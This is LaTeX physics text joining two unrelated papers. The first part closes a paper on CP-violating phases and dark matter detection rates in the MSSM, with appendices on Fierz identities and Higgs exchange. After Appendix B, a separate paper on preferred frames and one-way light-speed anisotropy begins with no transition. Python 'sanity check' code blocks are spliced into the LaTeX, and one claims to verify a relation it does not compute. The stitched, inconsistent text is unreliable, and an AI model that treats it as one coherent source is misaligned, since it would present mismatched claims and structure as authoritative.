+X_{30}^*(X_{20}^*-\tan\theta_W X_{10}^*)\sin\beta
\end{equation}
and
\begin{equation}
T_{\tilde{f}}(q)= \frac{1}{4m_q}\frac{1}
{M^2_{\tilde{q1}}-M^2_{\chi}} Im[C_{qL}C^{*}_{qR}]
+\frac{1}{4m_q}\frac{1}
{M^2_{\tilde{q2}}-M^2_{\chi}} Im[C^{'}_{qL}C^{'*}_{qR}]
\end{equation}
In the limit of vanishing CP violating phases our
results for A, B and C
reduce to those of Ref.\cite{jungman}.
In that limit our results differ
by a minus sign from the Z-exchange terms of Ref.\ \cite{drees} in
their equations (2a, 2b, A1). Further, in the same limit of
vanishing CP violating phases our results go over to those of Ref.\ \cite{flores}
up to an overall minus sign in the three exchange terms, i.e.,
the Z, the sfermion and the Higgs terms
(see Appendix B for details).
To compare our results to those of
reference\cite{falk3} we note that the analysis of reference\cite{falk3}
was limited to
the case of two CP violating phases and it gave the analytic results
for only some of the co-efficients in the low energy expansion of
Eq.(6).
The terms E and F given by
Eqs.(26) and (27) are new and vanish in the limit when CP is conserved.
The term D given by Eq.(25) is non-vanishing in the limit when CP
phases vanish. However, this term is mostly ignored in the literature
as its contribution is suppressed because of the small velocity
of the relic neutralinos. In fact the contributions of D,E and F are
expected to be relatively small and we ignore them in our numerical
analysis here.
For the computation of the event rates from nuclear
targets in the direct detection of dark matter we follow the
techniques discussed in Ref.\cite{arno}
and we refer the reader to it for details.
We give now the numerical estimates of the CP violating
effects on event rates. First we consider the case when
the EDM constraint is not imposed. In Fig.1 we exhibit the ratio
$R/R(0)$ for Ge where R is the event rate with CP violation arising from
a non-vanishing $\theta_{\mu}$ and R(0) is the
event rate in the absence of CP violation. The figure illustrates that
the effect of the CP violating phase can be very large. In fact, as can be
seen from Fig.1 the variations can be as large as 2-3 orders of
magnitude. However, as noted above the EDM constraint was not imposed
here.
Next we give the analysis with inclusion of
the EDM constraints.
For this purpose we work in the parameter space
where the cosmological relic density constraint and the EDM
constraints are simultaneously satisfied and we compute the
ratio R/R(0) for Ge in this region. Specifically the satisfaction of the relic
density and the EDM constraints is achieved by varying the
parameters of the theory. The satisfaction of the EDM
constraint is achieved through the cancellation mechanism discussed
in Refs.\cite{in1,in2}. The result
of this analysis is exhibited in Fig.2. Here we find the range of
variation of R/R(0) with $\theta_{\mu}$ to be much smaller although
still substantial. Thus from Fig.2 we find that
the variation of R/R(0) has a range of up to a factor of 2 over
most of the allowed parameter space satisfying the relic density and
the EDM constraints in the regions of the parameter investigated.
This variation is substantially smaller than the one observed in Fig.1
when the EDM constraints were not imposed.
In conclusion, we have given in this paper the first complete
analytic analysis of the effects of CP violating phases on the
event rates in the direct detection of dark matter within the
framework of MSSM with no generational mixing. We find that the
CP violating effects can generate variations in the event rates
up to 2-3 orders of magnitude. However, with the inclusion of the
EDM constraints the effects are much reduced although still
significant in that
the variations could be up to a factor $\sim 2$
as seen from the analysis over the region of the parameter
space investigated. Of course the parameter space of MSSM
is quite large and there may exist other regions of the parameter
space of MSSM where the CP violating effects on event rates
consistent with the EDM constraints are even larger.
\noindent
This research was supported in part by NSF grant
PHY-96020274.
\begin{figure}
\begin{center}
\includegraphics[angle=0,width=2.5in]{fig1.ps}
\caption{Plot of R/R(0) for Ge as a function of the CP violating phase
$\theta_{\mu}$ in the MSSM case when $\tan\beta=2$, $m_0=100$ GeV,
$|A_0|=1$ for the cases when the gluino mass is 500 GeV
(solid curve), 600 GeV (dotted curve), and 700 GeV (dashed
curve)}
\label{fig1}
\end{center}
\end{figure}
\begin{figure}
\begin{center}
\includegraphics[angle=0,width=2.5in]{fig2.ps}
\caption{Plot of R/R(0) for Ge as a function of the CP violating phase
$\theta_{\mu}$ for the parameter space discussed in the
text. The parameter space spans regions satisfying
the relic density and the EDM constraints obtained by varying other
parameters in the theory.
}
\label{fig2}
\end{center}
\end{figure}
\newpage
\section{Appendix A}
In this appendix we give a derivation of the effective four-fermi
neutralino-quark
Lagrangian with CP violating phases given in the text.
\subsection{Squark exchange terms}
From the microscopic quark-squark-neutralino Lagrangian\cite{in1}
\begin{equation}
-{\cal L}=\bar{q}[C_{qL}P_L+C_{qR}P_R]\chi\tilde{q}_1+
\bar{q}[C^{'}_{qL}P_L+C^{'}_{qR}P_R]\chi\tilde{q}_2+{\rm H.c.}
\end{equation}
the effective Lagrangian for $q-\chi$ scattering via the
exchange of squarks is given by
\begin{eqnarray}
{\cal L}_{eff}=\frac{1}{M^{2}_{\tilde{q_1}}-M^{2}_{\chi}}
\bar{\chi}[C^{*}_{qL}P_R+C^{*}_{qR}P_L]q\bar{q}[C_{qL}P_L+C_{qR}P_R]
\chi\nonumber\\
+\frac{1}{M^{2}_{\tilde{q_2}}-M^{2}_{\chi}}
\bar{\chi}[C^{*'}_{qL}P_R+C^{*'}_{qR}P_L]q
\bar{q}[C^{'}_{qL}P_L+C^{'}_{qR}P_R]
\chi
\end{eqnarray}
We use Fierz reordering to write the Lagrangian in terms
of the combinations
$\bar{\chi}\chi\bar{q}q$, $\bar{\chi}\gamma_5\chi\bar{q}\gamma_5q$,
$\bar{\chi}\gamma^{\mu}\gamma_5\chi\bar{q}\gamma_{\mu}q$,$
\bar{\chi}\gamma^{\mu}\gamma_5\chi\bar{q}\gamma_{\mu}\gamma_5q$,
$\bar{\chi}\gamma_5\chi\bar{q}q$ and $\bar{\chi}\chi\bar{q}\gamma_5q$.
For this purpose, we define the 16 matrices
\begin{equation}
\Gamma^A=\{1,\gamma^0,i\gamma^i,i\gamma^0\gamma_5,
\gamma^i\gamma_5,\gamma_5,i\sigma^{0i},\sigma^{ij}\}: ~~i,j=1-3
\end{equation}
with the normalization
\begin{equation}
tr(\Gamma^A\Gamma^B)=4\delta^{AB}
\end{equation}
The Fierz rearrangement formula with the above definitions and
normalizations is
\begin{equation}
(\bar{u_1}\Gamma^Au_2)(\bar{u_3}\Gamma^Bu_4)=\sum_{C,D}F^{AB}_{CD}
(\bar{u_1}\Gamma^Cu_4)(\bar{u_3}\Gamma^Du_2)
\end{equation}
where $u_j$ are Dirac or Majorana spinors and
\begin{equation}
F^{AB}_{CD}=
-(+)\frac{1}{16}tr(\Gamma^C\Gamma^A\Gamma^D\Gamma^B)
\end{equation}
and where the plus sign is for commuting $u$ spinors and the minus sign is for
anticommuting $u$ fields. In our case we must use the minus sign since
we are dealing with quantum Majorana and Dirac fields in the Lagrangian.
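As a numerical sanity check (our own, in the Dirac representation with metric $(+,-,-,-)$), the 16-matrix basis $\Gamma^A$ defined above can be verified to satisfy the trace normalization together with the completeness relation $\sum_{A}\Gamma^{A}_{ab}\Gamma^{A}_{cd}=4\delta_{ad}\delta_{bc}$ that makes the Fierz expansion possible:

```python
import numpy as np

I2 = np.eye(2)
sx = np.array([[0, 1], [1, 0]], dtype=complex)
sy = np.array([[0, -1j], [1j, 0]])
sz = np.array([[1, 0], [0, -1]], dtype=complex)
Z = np.zeros((2, 2))

def blk(a, b, c, d):
    return np.block([[a, b], [c, d]]).astype(complex)

g0 = blk(I2, Z, Z, -I2)                 # Dirac representation
gi = [blk(Z, s, -s, Z) for s in (sx, sy, sz)]
g5 = blk(Z, I2, I2, Z)

def sigma(ga, gb):                      # sigma^{mu nu} = (i/2)[g^mu, g^nu]
    return 0.5j * (ga @ gb - gb @ ga)

# The 16-element basis {1, g^0, i g^i, i g^0 g5, g^i g5, g5, i sigma^{0i},
# sigma^{ij}} with i,j = 1..3 and i < j for sigma^{ij}.
basis = ([np.eye(4, dtype=complex), g0] + [1j * g for g in gi]
         + [1j * g0 @ g5] + [g @ g5 for g in gi] + [g5]
         + [1j * sigma(g0, g) for g in gi]
         + [sigma(gi[i], gi[j]) for i in range(3) for j in range(i + 1, 3)])

G = np.array(basis)
gram = np.einsum('Aij,Bji->AB', G, G)   # tr(Gamma^A Gamma^B)
print(np.allclose(gram, 4 * np.eye(16)))
```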
We give below the Fierz rearrangement of the four combinations that appear
in Eq.(31) above:
\begin{eqnarray}
\bar{\chi}q\bar{q}\chi=-\frac{1}{4}\bar{\chi}\chi\bar{q}q-\frac{1}{4}
\bar{\chi}\gamma_5\chi\bar{q}\gamma_5q+\frac{1}{4}\bar{\chi}\gamma^{\mu}
\gamma_5\chi\bar{q}\gamma_{\mu}\gamma_5q\nonumber\\
\bar{\chi}\gamma_5
q\bar{q}\chi=\frac{1}{4}\bar{\chi}\gamma^{\mu}\gamma_5
\chi\bar{q}\gamma_{\mu}
q-\frac{1}{4}
\bar{\chi}\chi\bar{q}\gamma_5q-\frac{1}{4}\bar{\chi}\gamma_5
\chi\bar{q}q\nonumber\\
\bar{\chi}
q\bar{q}\gamma_5
\chi=-\frac{1}{4}\bar{\chi}\gamma^{\mu}\gamma_5
\chi\bar{q}\gamma_{\mu}
q-\frac{1}{4}
\bar{\chi}\chi\bar{q}\gamma_5q-\frac{1}{4}\bar{\chi}\gamma_5
\chi\bar{q}q\nonumber\\
\bar{\chi}\gamma_5
q\bar{q}\gamma_5
\chi=-\frac{1}{4}\bar{\chi}\chi\bar{q}q-\frac{1}{4}
\bar{\chi}\gamma_5\chi\bar{q}\gamma_5q-\frac{1}{4}\bar{\chi}\gamma^{\mu}
\gamma_5\chi\bar{q}\gamma_{\mu}\gamma_5q
\end{eqnarray}
In the above we have used the metric $\eta_{\mu\nu}=(1,-1,-1,-1)$,
and we also used the fact that $\chi$ is a
Majorana
field so that $\bar{\chi}\gamma_{\mu}\chi=0$
and $\bar{\chi}\sigma_{\mu\nu}\chi=0$.
By rearranging the terms into the form of ${\cal L}_{eff}$
of Eq.(6) we can directly read off
the squark contributions to the $A, B, C, D, E$ and $F$ terms as given in
the text of the paper.
\subsection{Z boson exchange}
From the $q-Z-q$ and $\chi-Z-\chi$ interactions
in Eqs. (c62) and (c87a) of Ref.\cite{kane}, we obtain the
following effective Lagrangian for the $q-\chi$ scattering via Z-exchange:
\begin{equation}
{\cal L}_{eff}=\frac{g^2}{4M^2_z \cos^2\theta_W}
[|X_{30}|^2-|X_{40}|^2]\bar{q}\gamma^{\mu}[d_{qL}P_L+
d_{qR}P_R]q\bar{\chi}\gamma_{\mu}\gamma_5\chi
\end{equation}
where $d_{qL}=T_{3L}-e_q\sin^2\theta_W$ and $d_{qR}=-e_q\sin^2\theta_W$.
From Eq.(37) we can read off the
contribution to A and B from the Z exchange. These contributions are
given in Eqs.(7) and (8).
\subsection{Higgs exchange terms}
Higgs exchange will contribute to $C, D, E$ and $F$ terms. From the
interaction Lagrangian of ${\cal L}_{H\chi\chi}$ and
${\cal L}_{Hq\bar{q}}$
in Eqs. (4.47) and (4.10) respectively of Ref.\cite{haber},
one can get the effective Lagrangian for $q-\chi$ scattering via $h^0$,
$H^0$ and $A^0$ exchanges. In our formalism we use $h^0$, $H^0$ and
$A^0$ for the light, heavy and CP-odd neutral Higgs bosons.
There are six contributions: three Higgs exchange terms
for the up flavor and three for the down flavor. To illustrate we
choose the up quark scattering with $\chi$ via the
exchange of the heavy Higgs $H^0$ ($H^0_1$ in the notation of
Ref.\cite{haber}):
\begin{equation}
{\cal L}_{eff}=\frac{1}{m^2_{H0}}(J^1_{H0}+J^2_{H0})I^u_{H0}
\end{equation}
where
\begin{eqnarray}
J^1_{H0}=-\frac{g}{2}\cos\alpha\bar{\chi}
(Q^{''*}_{00}P_L+Q^{''}_{00}P_R)\chi\nonumber\\
J^2_{H0}=\frac{g}{2}\sin\alpha\bar{\chi}
(S^{''*}_{00}P_L+S^{''}_{00}P_R)\chi\nonumber\\
I^u_{H0}=-\frac{gm_u\sin\alpha}{2M_W \sin\beta}\bar{u}u
\end{eqnarray}
where $Q_{00}^{''*}, S_{00}^{''*}$ are as defined in Ref.\cite{haber}.
Defining $\rho$ by
\begin{equation}
\rho=Q^{''}_{00}\cos\alpha-S^{''}_{00}\sin\alpha
\end{equation}
we get the $H^0$ contribution to ${\cal L}_{eff}$:
\begin{eqnarray}
{\cal L}_{eff}=\frac{g^2m_u\sin\alpha}{4M_W m^2_{H0}\sin\beta}Re(\rho)
\bar{\chi}\chi\bar{u}u\nonumber\\
+\frac{ig^2m_u\sin\alpha}{4M_Wm^2_{H0}\sin\beta}Im(\rho)
\bar{\chi}\gamma_5\chi\bar{u}u
\end{eqnarray}
From Eq.(41) we can read off directly the contributions
$C_{H0}(u) $ and $E_{H0}(u)$ as given by Eqs.(22) and (26).
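The split into ${\rm Re}(\rho)$ and ${\rm Im}(\rho)$ pieces in Eq.(41) rests on the matrix identity $\rho^{*}P_L+\rho P_R={\rm Re}(\rho)\,1+i\,{\rm Im}(\rho)\,\gamma_5$, which is easy to check numerically (Dirac representation of $\gamma_5$ assumed for the check):

```python
import numpy as np

I2, Z2 = np.eye(2, dtype=complex), np.zeros((2, 2), dtype=complex)
g5 = np.block([[Z2, I2], [I2, Z2]])        # gamma_5, Dirac representation
I4 = np.eye(4, dtype=complex)
PL, PR = (I4 - g5) / 2, (I4 + g5) / 2      # chiral projectors

rho = 0.7 - 1.3j                           # any complex coupling
lhs = np.conj(rho) * PL + rho * PR
rhs = rho.real * I4 + 1j * rho.imag * g5   # Re(rho) 1 + i Im(rho) gamma_5
assert np.allclose(lhs, rhs)
```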
\newpage
\section{Appendix B}
Here we compare our results with those of Ref.\cite{flores},
which are obtained in the limit of no CP violation, no sfermion mixing
and no heavy Higgs. In the limit of no CP violation and no sfermion
mixing,
$C_L, C_L', C_R, C_R'$ given by Eqs.(9-12) in the text reduce to the
following:
\begin{eqnarray}
C_L=\sqrt{2} \alpha_{q0},~~C_L'=-\sqrt 2 \gamma_{q0}\nonumber\\
C_R=\sqrt {2} \beta_{q0}, ~~C_R'=-\sqrt{2} \delta_{q0}
\end{eqnarray}
To express the above in the notation of Ref.\cite{flores}
we set $X_{10}^*=\beta$, $X_{20}^*=\alpha$, $X_{30}^*=\delta$,
and $X_{40}^*=\gamma$ keeping in mind that the $H_1$ and $H_2$ of
Ref.\cite{flores} are defined oppositely to our notation.
Using the above along with Eqs.(13-16) we find for
$T_3=\frac{1}{2}(-\frac{1}{2})$
\begin{eqnarray}
|C_L|^2=\frac{m_u^2(m_d^2)\gamma^2(\delta^2)}{\nu_1^2(\nu_2^2)}\nonumber\\
|C_L'|^2=2(g_1\frac{1}{2}Y_R\beta)^2\nonumber\\
|C_R|^2=2(\alpha g_2 T_{3}+\beta g_1\frac{Y_L}{2})^2\nonumber\\
|C_R'|^2=\frac{m_u^2(m_d^2)\gamma^2(\delta^2)}{\nu_1^2(\nu_2^2)}
\end{eqnarray}
where $Y_L$ is the hypercharge,
$\nu_1=\langle H_1\rangle$, and $\nu_2=\langle H_2\rangle$, where $H_1$ and $H_2$ are in
the notation of Ref.\cite{flores}.
Further using the identity
\begin{equation}
\frac{g_2^2}{\cos^2\theta_W}(T_{3}-e_q\sin^2\theta_W)=
-(g_1 \sin\theta_W+g_2 \cos\theta_W)(\frac{1}{2}Y_Lg_1 \sin\theta_W-
T_3g_2 \cos\theta_W)
\end{equation}
where the left hand side of Eq.(44) is written in the
form used in Ref.\cite{flores},
we can express A and B in the limit of no CP violation and
no sfermion mixing as follows: for $T_3=\frac{1}{2}(-\frac{1}{2})$
\begin{eqnarray}
A=\frac{(\gamma^2-\delta^2)}{4M_Z^2}
(g_1 \sin\theta_W+g_2 \cos\theta_W)(\frac{1}{2}Y_L g_1 \sin\theta_W-
T_3g_2 \cos\theta_W)\nonumber\\
-\frac{(\alpha g_2 T_{3}+\beta g_1\frac{Y_L}{2})^2}
{2(M_{\tilde q_L}^2-M_{\chi}^2)}
-\frac{m_u^2(m_d^2)\gamma^2(\delta^2)}
{4(M_{\tilde q_R}^2-M_{\chi}^2)\nu_1^2(\nu_2^2)}
\end{eqnarray}
\begin{eqnarray}
B=\frac{(\gamma^2-\delta^2)}{4M_Z^2}
(g_1 \sin\theta_W+g_2 \cos\theta_W)(\frac{1}{2}Y_L g_1 \sin\theta_W-
T_3g_2 \cos\theta_W)\nonumber\\
+\frac{(g_1\frac{1}{2}Y_R\beta)^2}{2(M_{\tilde q_R}^2-M_{\chi}^2)}
+\frac{m_u^2(m_d^2)\gamma^2(\delta^2)}
{4(M_{\tilde q_R}^2-M_{\chi}^2)\nu_1^2(\nu_2^2)}
\end{eqnarray}
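The identity (44) can be verified numerically once the standard relations $g_1=e/\cos\theta_W$, $g_2=e/\sin\theta_W$ and $Y_L=2(e_q-T_3)$ are assumed (inputs not spelled out in the text):

```python
import math

e, thw = 0.31, 0.49                 # arbitrary sample values
sw, cw = math.sin(thw), math.cos(thw)
g1, g2 = e / cw, e / sw             # assumed U(1) and SU(2) couplings

for T3, eq in ((+0.5, +2.0 / 3.0), (-0.5, -1.0 / 3.0)):
    YL = 2.0 * (eq - T3)            # assumed hypercharge normalization
    lhs = g2**2 / cw**2 * (T3 - eq * sw**2)
    rhs = -(g1 * sw + g2 * cw) * (0.5 * YL * g1 * sw - T3 * g2 * cw)
    assert math.isclose(lhs, rhs)   # Eq.(44) holds for both isospins
```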
To compare our $C$ term with that of Ref.\cite{flores} we
again go to the limit of vanishing CP violating phases,
assume no sfermion mixing, and in addition ignore
the heavy Higgs exchange contribution (i.e., the term $C_{H^0}$
of Eq.(22) in the text).
Then using similar notational changes as above we find that
our $C$ under the approximations made in Ref.\cite{flores}
is given by
\begin{eqnarray}
C=\frac{g_2^2}{4M_W m_{h^0}^2}\frac{(-\cos\alpha)(\sin\alpha)}
{(\sin\beta)(\cos\beta)}(\alpha-\beta \tan\theta_W)(\gamma \cos\alpha
+\delta \sin\alpha)\nonumber\\
-\frac{g_2}{4M_W}(\frac{\alpha g_2 T_{3}+\beta g_1\frac{Y_L}{2}}
{M_{\tilde q_L}^2-M_{\chi}^2}-\frac{\beta g_1\frac{Y_R}{2}}
{M_{\tilde q_R}^2-M_{\chi}^2})
\frac{\gamma (\delta)}{\sin\beta(\cos\beta)} ;~~T_3=\frac{1}{2}(-\frac{1}{2})
\end{eqnarray}
Comparing our results for $A$, $B$ and $C$ with those of Ref.\cite{flores}
we find that our Z, sfermion and Higgs exchange terms have an
overall minus sign relative to those of Ref.\cite{flores}.
\section{Introduction}
\label{s1}
The anisotropy in the
microwave background \cite{Smo77} has suggested the existence
of a preferred frame $\Sigma$ which sees an isotropic background and
of a corresponding anisotropy in the
one-way velocity of light, when measured in our system $S$, which
moves with
respect to $\Sigma$ at a velocity of about 377 km/s.
Possible consequences have been exploited from the theoretical point of
view \cite{Rob49} \cite{Man77};
many important and precise experiments have then been
carried out with the
purpose of detecting this anisotropy. No variation was
observed at the level of $3\times10^{-8}$
\cite{Tur64}, $2 \times 10^{-13}$ \cite{Bri79},
$3\times 10^{-9}$ \cite{Rii88},
$2 \times 10^{-15}$\cite{Hil90}, $3.5\times 10^{-7}$ \cite{Kri90},
$5\times10^{-9}$ \cite{Wol97}.
Our motion with respect
to $\Sigma$ is a composition of the motions of the
Earth in the solar system, of this system in our galaxy, of our galaxy
inside a group of galaxies, and so on.
The problem which arises
is a very old one: may we perform, on or near the
Earth, experiments to make evident
our motion with respect to the preferred frame?
Historically, this question has been formulated in two steps,
connected with the relativity principle and the equivalence principle,
respectively.
The first step is due to Galilei,
who excluded the possibility of performing,
inside a ship cabin, experiments
aimed at measuring the ship's
velocity with respect to the mainland.
To relate the background radiation
case to the Galilei proposal:
if the sunlight entering the cabin through a porthole
were analysed, its
black-body radiation spectrum would appear different from the one
observed on the mainland.
The second step was introduced by Einstein
through the equivalence principle \cite{Wil93}:
{\it At every space-time point in an arbitrary
gravitational field it is
possible to choose a ``locally inertial coordinate system''
such that, within a
sufficiently small region of the point in question,
the laws of nature take the same form
as in unaccelerated Cartesian coordinate
systems in absence of
gravitation}.\cite{Wei72}
As a consequence, experiments inside a freely falling space cabin
exhibit its relative motion only in the presence of inhomogeneities
in the gravitational field.
In the following sections
we discuss the quoted experiments according to the two steps
outlined above.
In section 2 we analyse the linear transformations due to
Robertson and to Mansouri and Sexl, which generalize the Lorentz
one and which have stimulated the experiments we are speaking of.
We conclude that, due to the definitional role of light velocity,
the linear transformations between inertial frames must have
Lorentz form.
In section 3 we analyse the possibility of locally detecting
anisotropies in the light velocity in the case of general relativity.
\section{The preferred frame}
The linear transformations between inertial frames
have been analysed by very many authors (a list of them is given
in ref. \cite{Pre94})
under hypotheses which include the requirement that they form a group,
but do not include, a priori,
the invariance of the light velocity. They conclude that these (Lorentz)
transformations must be characterized by a velocity
$c$, infinite in the Galilei limit, which, in principle,
may take different absolute values in the different
astronomical directions.
Robertson \cite{Rob49} and
Mansouri and Sexl \cite{Man77}
have analysed the linear transformation between
the preferred reference frame $\Sigma$
and another inertial frame $S$ which is moving with respect to it.
Robertson derives the following general linear transformation between
the preferred system $\Sigma(x',y',z',t')$
and the frame $S(x,y,z,t)$, which
moves along the $x$-direction which connects the respective origins $\Omega$
and $O$:
\begin{equation}
x'=a_{1}x+va_{0}t,~~~~y'=a_{2}y,~~~~z'=a_{2}z,~~~~t'=\frac{va_{1}}{c^{2}}x
+a_{0}t,
\end{equation}
where $a_{0}$, $a_{1}$ and $a_{2}$ may depend on $v$.
This transformation, which is expressed in terms of the parameter $v$
and which reduces to the identity when $v=0$,
is derived under the hypotheses that:
$i)$ space is euclidean
for both $\Sigma$ and $S$;
$ii)$ in
$\Sigma$ all clocks are synchronized and light moves
with a speed $c$ which
is independent of direction and position;
$iii)$ the one-way speed of
light in $S$ in planes perpendicular to the motion of $S$
is orientation-independent.
Notice that $O$ moves with respect to $\Sigma$ with
velocity $v$, while $\Omega$ moves with respect to $S$ with
velocity $\tilde{v}\equiv v a_{0}/a_{1}$ ; analogously, light,
which is seen
by $\Sigma$ to move according to the law $x'=ct'$, is seen by
$S$ to move with velocity
$\tilde{c}\equiv c a_{0}/a_{1}$, independently of
the direction of $c$. If $c$ is the maximum speed in $\Sigma$, $\tilde{c}$
is the maximum speed in $S$; moreover $\tilde{v}/\tilde{c}=v/c$.
In terms of these
true velocities, equations (1) take the form
\begin{equation}
t'=a_{0}\left(t+\frac{\tilde{v}}{\tilde{c}^{2}}x\right),~
x'=a_{1}\left(x+\tilde{v}t\right),~
y'=a_{2}y,~
z'=a_{2}z.
\end{equation}
The transformation is then the product of a Lorentz transformation and
a scale transformation; the latter may be re-absorbed by a redefinition of the
units.
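The equivalence of (1) and (2), and the announced factorization, can be checked numerically; the sketch below uses arbitrary sample values of $a_0$, $a_1$ and $v$ (the residual scale factors are absorbed by the redefinition of units just described):

```python
import numpy as np

c, v = 1.0, 0.3              # units with c = 1 in Sigma; any |v| < c works
a0, a1 = 1.7, 1.2            # arbitrary values of the functions a_0(v), a_1(v)

# Eq.(1), acting on (x, t):  x' = a1 x + v a0 t,  t' = (v a1/c^2) x + a0 t
M1 = np.array([[a1, v * a0],
               [v * a1 / c**2, a0]])

# Eq.(2): the same map written with the "true" velocities seen by S
vt, ct = v * a0 / a1, c * a0 / a1
M2 = np.array([[a1, a1 * vt],
               [a0 * vt / ct**2, a0]])
assert np.allclose(M1, M2)

# M2 = (diagonal scale factors) x (boost with velocity vt, light speed ct);
# note that 1 - vt^2/ct^2 = 1 - v^2/c^2
g = 1.0 / np.sqrt(1.0 - vt**2 / ct**2)
L = g * np.array([[1.0, vt], [vt / ct**2, 1.0]])
assert np.allclose(M2, np.diag([a1 / g, a0 / g]) @ L)
```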
If the length standard is established, in any frame,
by giving an assigned value to the speed of
light, then the light velocities in $\Sigma$ and $S$ are equal, $x$
is scaled by $a_{0}/a_{1}$ and the transformation between the $(x,t)$
variables takes a familiar form.
The fact that this transformation implies different
light speeds in different directions in the $(x,y)$ plane is, a priori,
admissible.
This case is typical of a tetragonal crystal; the light speeds may be different
in the $x$ and in the $y$ directions, when measured with external
standards; a suitable internal scaling of the $y$ variable would of
course give the same value to the internal velocities, but the time
required for the light to traverse the crystal in the $y$-direction would
be different from the one seen by an external observer.
In this case the attribution of different light speeds for different
directions is physically justified. But if we have no such a justification,
the thing to do is to apply the Poincar\'e simplicity criterion and to
attribute the same value to the light speed in different directions.
Mansouri and Sexl \cite{Man77}
analyse the linear
transformation from a preferred frame $\Sigma (X,T)$ to
another frame
$S (x,t)$, which moves with respect to it at the velocity $v$,
under the hypothesis that
the synchronization is realized by clock transport.
Their analysis is devoted both to one-dimensional transformations and
to three-dimensional ones; we do not discuss here the last case,
but the conclusions will apply as well.
To first order in $v$, the Mansouri and Sexl
one-dimensional transformation takes the form:
\begin{equation}
\left(\begin{array}{c}x\\t\end{array}\right)=
\frac{1}{\sqrt{1-(1-\mu)\frac{v^{2}}{c^{2}}}}\left(\begin{array}{cc}
1 & -v\\ -\frac{(1-\mu) v}{c^{2}}&1
\end{array}\right)
\left(\begin{array}{c}X\\T\end{array}\right),
\end{equation}
where $c$ is the isotropic light speed seen by $\Sigma$
and their quantity $2\alpha$
is substituted here by $-(1-\mu)/c^{2}$ to make explicit the Lorentz and
Galilei limits
($\mu=0$ and $\mu=1$, respectively).
If $\mu\ne 0$, then a particle, which moves with velocity
$u$ in $\Sigma$, appears to $S$ to move according the law:
\begin{equation}
x=\frac{u-v}{1-(1-\mu)\frac{uv}{c^{2}}}t.
\end{equation}
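The composition law (4) follows from applying the matrix in (3) to a world line $X=uT$; a quick numerical check with sample values:

```python
import numpy as np

c, v, mu, u = 1.0, 0.25, 0.4, 0.6   # samples; mu=0 Lorentz, mu=1 Galilei limit

g = 1.0 / np.sqrt(1.0 - (1.0 - mu) * v**2 / c**2)
M = g * np.array([[1.0, -v],
                  [-(1.0 - mu) * v / c**2, 1.0]])   # Eq.(3), acting on (X, T)

T = 5.0
x, t = M @ np.array([u * T, T])     # event on the world line X = u T
assert np.isclose(x / t, (u - v) / (1.0 - (1.0 - mu) * u * v / c**2))  # Eq.(4)
```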
The maximum speed of a frame with respect to $\Sigma$
is $c/\sqrt{1-\mu}$,
independently of the orientation; if something is seen by
$\Sigma$ to move at this speed, it is seen to move
at the same invariant speed by all frames, independently of the orientation.
On the other hand, light, which moves with respect to
$\Sigma$ according to $X=\pm cT$, moves, in our frame $S$,
according to $x=t(c\mp v)/(1\mp (1-\mu)v/c^{2})$,
the sign depending on the motion orientation.
Light speed is no more the maximum one, and, what is more relevant,
the one-way light velocities in $S$ are different.
The undetectability of a possible dependence of
the one-way velocity along a line on its orientation has been extensively
discussed in the literature \cite{Rei28} \cite{Gru73}. As a consequence, $\mu=0$.
The last indisputable conclusion finds a confirmation in the following
experimental fact: electrons in the large accelerator machines now have
energies of $\sim 100$ GeV; at this energy,
$\frac{v^{2}}{c^{2}}\sim 1-2\cdot 10^{-11}$, but the
electrons have not reached the light
speed; we must then have
$\mu<2\cdot 10^{-11}$.
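The quoted order of magnitude follows from $1-v^{2}/c^{2}=(mc^{2}/E)^{2}$ for a relativistic electron of energy $E$; taking the standard rest energy $mc^{2}\simeq 0.511$ MeV (an input not given in the text):

```python
m_e = 0.511e-3     # electron rest energy in GeV (assumed standard value)
E = 100.0          # electron energy in GeV, as quoted above

eps = (m_e / E) ** 2                # eps = 1 - v^2/c^2
print(f"1 - v^2/c^2 = {eps:.1e}")   # ~2.6e-11, the order of magnitude quoted
```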
The situation does not change if we go beyond the lowest order and suppose
that $\mu$ is a function (even) of $v$.
\section {Local inertial systems}
The above considerations refer to situations in which we are performing
our experiments in frames which are seen by $\Sigma$ to move inertially.
Our conclusion is that, if the transformation between the preferred
frame and our one is taken to be linear, then it must have Lorentz form.
On the other hand, the anisotropy of the primordial radiation strongly
supports the existence of the preferred frame with respect to which
we are moving. It must then be analysed
how our state of non-inertial motion affects the experiments we are
discussing.
The starting point is the fact that
the background radiation intensity appears to be anisotropic to
an observer $O$,
at the origin of a reference frame $S$ in our region $R$ of the universe,
while it is isotropic from the point of view of an observer $\Omega$, at
the origin of a preferred reference frame $\Sigma$.
In the last case, the absolute
system $\Sigma$ and the relative
frame $S$ of our region of the universe detect differences in the
radiation background, but no differences in any {\it local}
experiment.
The region $R$ behaves like the world
inside an Einstein elevator; the Einstein equivalence
principle states that,
if $\Omega$ and $O$ perform, in their
respective regions, identical experiments
which are not influenced by the presence of local masses (Earth,
Sun, ...), they obtain identical results.
An immediate consequence is
that the inertia principle is valid for all local inertial systems.
This concept is very clearly stated by Hans Reichenbach \cite{Rei28}:
{\it According to Einstein, however, only these
local systems are the actual inertial systems. In them the field, which
generally consists of a gravitational and an inertial component, is
transformed in such manner that the gravitational component disappears
and only the inertial component
remains.}
Analogously, the local inertial systems associated to an Einstein
elevator are connected by linear transformations characterized by
an invariant velocity $c$.
So, our region $R$ and another region $R'$ in the universe have
separate families of local inertial frames, characterized by identical light
speeds, although the latter
may appear different when measured by an asymptotic observer
who sees how the space curvature changes in going from $R$ to $R'$.
A well known example is given by the time delay measured in the Shapiro
\cite {Sha71} and Reasenberg \cite{Rea79} experiments: an asymptotic
observer detects a delay in the light trip, but any observer, who is
in the region this ray is passing through, says that it is moving at the
speed of $c$.
Coming back to the experiments performed in the presence of the Earth and the Sun,
we do not exclude that local observers may see general
relativistic effects induced by their masses \cite{Cha83}.
The light behaviour is, however,
locally influenced by gravity only through a
bending which is very small and difficult to detect \cite{Pre98};
this is not true for the motions
of the satellites involved in some of the quoted experiments.
All gravity effects due to the nearest relevant masses
have been consistently taken into account in the previous experiments,
which must be highly regarded for their precision.
The conclusion of these experiments is
that, apart from some very small local effects,
the Lorentz transformation applies in our region $R$, and that
our region belongs to a family of local inertial frames.
The force which induces the acceleration seen by some asymptotic observer
is completely cancelled by the equivalence principle.
\section{Conclusions}
There is no way to perform
independent measurements of lengths and light velocities; in other words,
if the light velocity is used both for synchronizing clocks and for
fixing the unit of length,
there is no way of locally detecting any dependence on the orientation of
(the length of) a rod. The only thing to do is to use the Poincar\'e
simplicity criterion and consider equal the lengths of the rods and the
one-way speeds of light in the different directions.
